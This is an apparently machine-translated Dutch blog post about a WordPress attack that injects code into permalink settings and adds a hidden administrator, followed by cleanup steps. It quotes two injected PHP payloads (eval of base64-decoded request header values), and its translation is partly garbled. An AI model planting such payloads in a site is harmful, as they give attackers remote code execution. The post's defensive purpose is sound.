WordPress SQL Injection - Latest Attack
Veel sites worden getroffen door een recente SQL-aanval waarbij codes op uw site worden geïnjecteerd. Deze MySQL-injectie beïnvloedt uw permalinks door ze niet effectief te maken. Als gevolg hiervan werken uw blog-URL's niet. Talloze WordPress-blogs waren gericht op deze aanval, met dank aan Andy Soward voor het onder onze aandacht brengen hiervan.
Er was een van de volgende codes die door deze aanval aan uw permalink-structuur zijn toegevoegd:
% & ($ Eval (base64_decode ($ _ SERVER [HTTP_REFERER])) |. +) &%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Deze aanhalingstekens hebben alle permalinks op uw site toegevoegd en kunnen alleen worden gewijzigd als ze handmatig worden verwijderd.
Om dit op te lossen, ga naar:
Instellingen> Permalinks en verwijder de bovenstaande code en vervang uw standaardcode.
Het volgende dat u hoeft te doen is naar Gebruikers gaan. U zult zien dat er meer dan één beheerder is. Je zult hun naam niet zien staan, maar je zult zien dat de telling is toegenomen. Dus wat je moet doen is naar alle gebruikers kijken en de laatste vinden die zich heeft geregistreerd. Ga met je muis over die gebruiker en verkrijg de link. Wijzig de code userid = door 1 toe te voegen aan dat nummer. Dus als de laatste gebruiker die u kunt zien gebruiker # 2 was, voeg dan er 1 toe en maak er 3. U zou moeten vinden dat de verborgen beheerder een rare code als voornaam heeft. Verwijder de code en maak hem een abonnee. Keer dan terug en verwijder hem.
Dit zou het probleem moeten oplossen. Je kunt hem ook verwijderen door simpelweg naar je PHPMyAdmin te gaan. Omdat je de gebruiker daar zult zien.
We wilden dit nieuws zo snel mogelijk ontvangen, zodat onze gebruikers kunnen worden bijgewerkt. Zorg ervoor dat je controleert of je blog niet is geïnfecteerd. We hopen dat WordPress binnenkort verschijnt met een release.
Ook als u sommige van deze maatregelen niet hebt geïmplementeerd om uw WordPress-beheerdersgebied te beveiligen.